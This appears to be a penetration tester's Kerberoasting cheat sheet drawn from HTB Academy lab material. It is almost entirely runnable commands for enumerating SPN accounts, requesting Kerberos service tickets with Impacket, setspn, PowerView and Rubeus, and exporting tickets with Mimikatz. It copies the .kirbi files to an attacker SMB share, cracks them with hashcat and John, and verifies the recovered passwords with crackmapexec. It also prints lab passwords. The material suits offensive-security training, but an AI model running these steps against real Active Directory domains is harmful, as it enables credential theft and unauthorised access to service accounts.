Skip to content

Kerberoasting

Depending on your position in a network, this attack can be performed in multiple ways:

  • From a non-domain joined Linux host using valid domain user credentials.
  • From a domain-joined Linux host as root after retrieving the keytab file.
  • From a domain-joined Windows host authenticated as a domain user.
  • From a domain-joined Windows host with a shell in the context of a domain account.
  • As SYSTEM on a domain-joined Windows host.
  • From a non-domain joined Windows host using runas /netonly.

Kerberoasting - from Linux

🔥 Kerberoasting with GetUserSPNs.py

A prerequisite to performing Kerberoasting attacks is either - domain user credentials (cleartext or just an NTLM hash if using Impacket) - a shell in the context of a domain user - or account such as SYSTEM. Once we have this level of access, we can start. We must also know which host in the domain is a Domain Controller, so we can query it.

Listing SPN Accounts with GetUserSPNs.py

Start by just gathering a listing of SPNs in the domain - set of valid domain credentials - IP address of a Domain Controller. 

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/<USER-NAME>
# GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/htb-student   #Passowrd: Academy_student_AD! 
# /opt/tools/impacket/examples/GetUserSPNs.py -dc-ip $IP $DOMAIN/Administrator:'P@$$W0rd'

Requesting all TGS Tickets (op.1)

Pull all TGS tickets for offline processing using the -request flag. The TGS tickets will be output in a format that can be readily provided to Hashcat or John the Ripper for offline password cracking attempts. 

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/<USER-NAME> -request

Requesting a Single TGS ticket (op.2)

We can also be more targeted and request just the TGS ticket for a specific account. Let's try requesting one for just the sqldev account. 

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/<USER-NAME> -request-user <TARGET-USER-NAME>
# GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/htb-student -request-user SAPService   #Passowrd: Academy_student_AD!
# /opt/tools/impacket/examples/GetUserSPNs.py -dc-ip $IP $DOMAIN/Administrator:'P@$$W0rd' -request-user SQLService

Saving the TGS Ticket to an Output File

To facilitate offline cracking, it is always good to use the -outputfile flag to write the TGS tickets to a file that can then be run using Hashcat on our attack system or moved to a GPU cracking rig. 

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/<USER-NAME> -request-user <TARGET-USER-NAME> -outputfile hash.txt
# GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/htb-student -request-user SAPService -outputfile hash.txt     #Passowrd: Academy_student_AD!

Cracking the Ticket Offline with Hashcat

Here we've written the TGS ticket for the SAPService user to a file named hash.txt. Now we can attempt to crack the ticket offline using Hashcat hash mode 13100. 

hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
# hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt --force

Testing Authentication against a Domain Controller

sudo crackmapexec smb 172.16.5.5 -u <USER-NAME> -p <PASSWORD>
# sudo crackmapexec smb 172.16.5.5 -u SAPService -p !SapperFi2

Kerberoasting - from Windows

🔥 Kerberoasting - Semi Manual method

Listing SPN Accounts with setspn.exe

setspn.exe -Q */*

Requesting all TGS Tickets with setspn.exe (op.1)

setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

Requesting a Single TGS ticket (op.2)

Using PowerShell, we can request TGS tickets for an account in the shell and load them into memory. Once they are loaded into memory, we can extract them using Mimikatz. 

Add-Type -AssemblyName System.IdentityModel
- The Add-Type cmdlet is used to add a .NET framework class to our PowerShell session, which can then be instantiated like any .NET framework object - The -AssemblyName parameter allows us to specify an assembly that contains types that we are interested in using - System.IdentityModel is a namespace that contains different classes for building security token services. 
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"
- We'll then use the New-Object cmdlet to create an instance of a .NET Framework object - We'll use the System.IdentityModel.Tokens namespace with the KerberosRequestorSecurityToken class to create a security token and pass the SPN name to the class to request a Kerberos TGS ticket for the target account in our current logon session.

Extracting Tickets from Memory with Mimikatz

> mimikatz.exe

mimikatz> privilege::debug
mimikatz> base64 /out:true
mimikatz> kerberos::list /export
- If we do not specify the base64 /out:true command, Mimikatz will extract the tickets and write them to .kirbi files.

Preparing the Base64 Blob for Cracking 

echo "<base64 blob>" |  tr -d \\n

Placing the Output into a File as .kirbi 

cat encoded_file | base64 -d > sqldev.kirbi

Extracting the Kerberos Ticket using kirbi2john.py

python2.7 kirbi2john.py sqldev.kirbi

Modifiying crack_file for Hashcat

Szalek@htb[/htb]$ sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat

Cracking the Hash with Hashcat

hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt

🔥 Kerberoasting - PowerView.ps1

Using PowerView to Extract TGS Tickets

enumerating SPN accounts 

Import-Module .\PowerView.ps1

Get-DomainUser * -spn | select samaccountname
From here, we could target a specific user and retrieve the TGS ticket in Hashcat format.

Using PowerView to Target a Specific User (op.1)

Get-DomainUser -Identity svc_vmwaresso | Get-DomainSPNTicket -Format Hashcat

Exporting All Tickets to a CSV File (op.2)

Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation

Cracking the Hash with Hashcat

cat hash_raw.txt  |  tr -d \\n > hash.txt
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt

🔥 Kerberoasting - Rubeus.exe

Stats

We can first use Rubeus to gather some stats. 

.\Rubeus.exe kerberoast /stats

Request tickets (op.1)

Use Rubeus to request tickets for accounts with the admincount attribute set to 1. 

.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap

Request ticket (op.2)

.\Rubeus.exe kerberoast /user:svc_vmwaresso /nowrap

Cracking the Ticket with Hashcat & rockyou.txt

hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt

Notes

list SPN 

setspn -T dc1 -Q */*
list SPN 
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

$PDC = ($domainObj.PdcRoleOwner).Name

$searchStr = "LDAP://"
$searchStr += $PDC + "/"
$Name = "DC=$($domainObj.Name.Replace('.',',DC='))"
$searchStr += $Name

$seracher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$searchStr)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry

$seracher.SearchRoot = $objDomain

$seracher.filter = "serviceprincipalname=*"

$items = $seracher.FindAll()

Write-Host "-------------------------"

Foreach($obj in $items) {
    Foreach($prop in $obj.Properties) {
        Write-Host "Display Name:" $prop.displayname
        Write-Host "Serviceprincipal Name:" $prop.serviceprincipalname
    }
    Write-Host "-------------------------"
}
create Service Token for SPN 
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/CorpWebServer.corp.com'
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'MSQL/CorpSqlServer.corp.com'
klist
save token to disk 
> mimikatz.exe
mimikatz> privilege::debug
mimikatz> kerberos::list /export
copy file to kali 
# on kali
/opt/tools/impacket/examples/smbserver.py public .
# on windows
copy '0-00000000-user@HTTP~CorpWebServer.corp.com-CORP.COM.kirbi' \\192.168.111.222\public\
tool:kerberoast - crack .kirbi file 
sudo apt install -y kerberoast
python3 /usr/share/kerberoast/tgsrepcrack.py /usr/share/wordlists/rockyou.txt 0-00000000-user@HTTP~CorpWebServer.corp.com-CORP.COM.kirbi
tool:john - crack .kirbi file 
/opt/tools/kerberoast/kirbi2john.py 0-00000000-user@HTTP~CorpWebServer.corp.com-CORP.COM.kirbi > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt